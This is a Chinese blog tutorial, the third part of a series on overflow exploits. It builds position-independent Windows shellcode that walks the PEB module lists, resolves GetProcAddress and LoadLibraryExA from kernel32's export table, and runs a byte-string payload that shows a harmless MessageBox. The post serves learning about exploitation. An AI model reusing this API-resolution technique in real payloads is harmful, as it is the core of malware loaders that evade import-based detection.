溢出漏洞原理及利用(3)

版权声明:原创文章转载请联系作者授权 https://blog.csdn.net/wrsharper/article/details/79954046

溢出漏洞原理及利用

本文是作者学习过程的笔记整理而来的,如有错误,还请见谅!

接上一篇

适用性更强的MessageBox

之前我们写的MessageBox,是直接在调试器中找到的地址.当模块使用动态加载基址的时候,我们重启系统或者在其他机器上运行的时候,函数地址就改变了.
为了程序在其他系统通用,需要动态获取MessageBoxA和EixtProcess函数的地址.
思路就是:
使用FS寄存器找到当前TEB,得到0x30处的PEB,通过PEB中0xC0出的位置找到PEB_LDR_DATA的结构体指针,使用其中的三个模块信息链表寻找kernel32.dll,然后找到dll中导出的GetProcAddress函数的地址,使用GetProcAddress函数获取LoadLibrary函数的地址
有了这两个函数,其他函数就都可以获取了.
一般三个链表顺序如图(第一个都为ntdll.dll):
这里写图片描述
通过三个链表查看加载模块信息,代码:

    int main()
{
    void *PEB = NULL,
        *Ldr = NULL,
        *FlinkLoad = NULL,
        *FlinkMem = NULL,
        *FlinkInit = NULL,
        *p = NULL,
        *BaseAdd = NULL,
        *FullName = NULL,
        *BaseDllName = NULL;
    __asm 
    {
        push eax;
        mov eax, fs:[0x30];// PEB
        mov PEB, eax;
        pop eax;
    }
    Ldr = (PVOID)*((PDWORD)((DWORD)PEB + 0x0C));
    FlinkLoad = (PVOID)*((PDWORD)((DWORD)Ldr + 0x0C));
    FlinkMem = (PVOID)*((PDWORD)((DWORD)Ldr + 0x14));
    FlinkInit = (PVOID)*((PDWORD)((DWORD)Ldr + 0x1C));
    printf("------使用加载顺序链查找-----\n\n");
    // 使用加载链找
    p = FlinkLoad;
    do 
    {
        BaseAdd = (PVOID)*(PDWORD)((DWORD)p + 0x18);
        FullName = (PVOID)*((PDWORD)((DWORD)p + 0x28));
        BaseDllName = (PVOID)*((PDWORD)((DWORD)p + 0x30));
        wprintf(L"FullName is %s\n", FullName);
        wprintf(L"BaseDllName is %s\n",BaseDllName);
        printf("BaseAddress is 0x%x\n", BaseAdd);
        p = (PVOID)*((PDWORD)p);
    } while (FlinkLoad!=p);


    printf("------使用内存顺序链查找-----\n\n");
    // 使用内存链找
    p = FlinkMem;
    do 
    {
        BaseAdd = (PVOID)*((PDWORD)((DWORD)p + 0x10));
        FullName = (PVOID)*((PDWORD)((DWORD)p + 0x20));
        BaseDllName = (PVOID)*((PDWORD)((DWORD)p + 0x28));
        wprintf(L"FullName is %s\n", FullName);
        wprintf(L"BaseDllName is %s\n",BaseDllName);
        printf("BaseAddress is 0x%x\n", BaseAdd);
        p = (PVOID)*((PDWORD)p);
    } while (FlinkMem!=p);
    printf("------使用初始化顺序链查找----\n\n");
    // 使用初始化链找
    p = FlinkInit;
    do
    {
        BaseAdd = (PVOID)*((PDWORD)((DWORD)p + 0x08));
        FullName = (PVOID)*((PDWORD)((DWORD)p + 0x18));
        BaseDllName = (PVOID)*((PDWORD)((DWORD)p + 0x20));
        wprintf(L"FullName is %s\n", FullName);
        wprintf(L"BaseDllName is %s\n",BaseDllName);
        printf("BaseAddress is 0x%x\n", BaseAdd);
        p = (PVOID)*((PDWORD)p);
    }
    while (FlinkInit != p);
    return 0;
}

根据以上思路开始实现.
1.获取kernel32基址(这里我们通过第三个链表来获取kernel32.dll的基址):

//获取kenerl32模块基址
        mov esi, dword ptr fs : [0x30];             //esi=PEB地址
        mov esi, [esi + 0x0C];                      //esi=指向PEB_LDR_DATA结构体的指针
        mov esi, [esi + 0x1C];                      //esi=结构体中的第三个链表InInitializationOrderMoudleList指针
        mov esi, [esi];                             //esi=链表中第二个元素即kernelBase模块的信息
        mov esi, [esi];                             //esi=链表中第三个元素即kernel32模块的信息
        mov edx, [esi + 0x8];                       //edx=DllBase(即kernel32的基址)

2.获取GetProcAddress函数地址

//获取关键函数地址
    fun_GetProcAddress: //(int ImageBase,int BaseAddr)
        push ebp;
        mov ebp, esp;
        sub esp, 0x0C;
        push edx;
        //获取EAT,ENT与EOT的地址
        mov edx, [ebp + 0x08];                      //kernel32.dll基址
        mov esi, [edx + 0x3C];                      //IMAGE_DOS_HEADER.elfanew
        lea esi, [edx + esi];                       //PE文件头VA(基址+偏移)
        mov esi, [esi + 0x78];                      //IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress  
        lea esi, [edx + esi];                       //导出表VA
        mov edi, [esi + 0x1C];                      //_IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
        lea edi, [edx + edi];                       //EAT  VA
        mov[ebp - 0x04], edi;                       //Local_1=EAT  VA//导出地址表  
        mov edi, [esi + 0x20];                      //_IMAGE_EXPORT_DIRECTORY.AddressOfNames
        lea edi, [edx + edi];                       //ENT  VA
        mov[ebp - 0x08], edi;                       //Local_2=ENT  VA//导出名称表  
        mov edi, [esi + 0x24];                      //_IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
        lea edi, [edx + edi];                       //EOT  VA
        mov[ebp - 0x0C], edi;                       //Local_3=EOT  VA//指向导出序列号数组
        //循环对比ENT中的函数名
        xor eax, eax;
        jmp tag_FirstCmp;
    tag_CmpFunNameCmp:
        inc eax;
    tag_FirstCmp:
        mov esi, [ebp - 0x08];                      //Local_2=ENT  VA
        mov esi, [esi + eax * 4];                   //ENT  RVA
        mov edx, [ebp + 0x08];                      //Param_1(ImageBase)
        lea esi, [edx + esi];                       //ENT  VA
        mov ebx, [ebp + 0x0C];                      //Param_2(BaseAddr)
        lea edi, [ebx - 0x51];                      //GetProcAddress字符串
        mov ecx, 0x0E;                              //GetProcAddress字符串长度
        cld;
        repe cmpsb;                                 //对比ESI,EDI
        jne tag_CmpFunNameCmp;                      //不相等继续循环对比
        //对比成功后,找到对应的序号
        mov esi, [ebp - 0x0C];                      //Local_3=EOT  VA
        xor edi, edi;
        mov di, [esi + eax * 2];                    //用函数名数组下标在序号数组找到对应的序号
        //使用序号作为索引,找到函数名所对应的函数地址
        mov edx, [ebp - 0x04];                      //Local_1=EAT  VA
        mov esi, [edx + edi * 4];                   //用序号在函数地址数组找到对应的函数地址
        mov edx, [ebp + 0x08];                      //edx=Param_1(ImageBaes)
        //返回关键函数地址
        lea eax, [edx + esi];                       //返回GetProcAddress函数地址
        pop edx;
        mov esp, ebp;
        pop ebp;
        retn 0x08;

3.获取LoadLibraryExA函数地址

//获取LoadLibraryExA函数地址
        lea ecx, [ebx - 0x43];                      //获取LoadLibraryExA字符串地址
        push ecx;                                   //|-lpProcName="LoadLibraryExA"
        push edx;                                   //|-hMoudle=kernel32.dll
        call eax;                                   //GetProcAddress();

最终,写完汇编代码生成ShellCode,我们就能使用所有的函数了.
最后的shellcode:

// shellcode_helloworld2.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"

char bShellcode[] = "\x60\x83\xEC\x20\xEB\x4C\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x36\x8B\x56\x08\x52\x53\x52\xE8\x13\x00\x00\x00\x8B\xF0\x8D\x4B\xBD\x51\x52\xFF\xD0\x5A\x53\x56\x50\x52\xE8\x6E\x00\x00\x00\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x08\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC0\xEB\x01\x40\x8B\x75\xF8\x8B\x34\x86\x8B\x55\x08\x8D\x34\x32\x8B\x5D\x0C\x8D\x7B\xAF\xB9\x0E\x00\x00\x00\xFC\xF3\xA6\x75\xE3\x8B\x75\xF4\x33\xFF\x66\x8B\x3C\x46\x8B\x55\xFC\x8B\x34\xBA\x8B\x55\x08\x8D\x04\x32\x5A\x8B\xE5\x5D\xC2\x08\x00\x55\x8B\xEC\x83\xEC\x08\x8B\x5D\x14\x8D\x4B\xCC\x6A\x00\x6A\x00\x51\xFF\x55\x0C\x8D\x4B\xD7\x51\x50\xFF\x55\x10\x89\x45\xFC\x8D\x4B\xE3\x51\xFF\x75\x08\xFF\x55\x10\x89\x45\xF8\x8D\x4B\xEF\x6A\x00\x51\x51\x6A\x00\xFF\x55\xFC\x6A\x00\xFF\x55\xF8\x8B\xE5\x5D\xC2\x10\x00";

int main()
{
    //Fun();
    _asm
    {
        lea eax, bShellcode;
        push eax;
        ret;
    }
    return 0;
}

运行效果:
这里写图片描述


阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页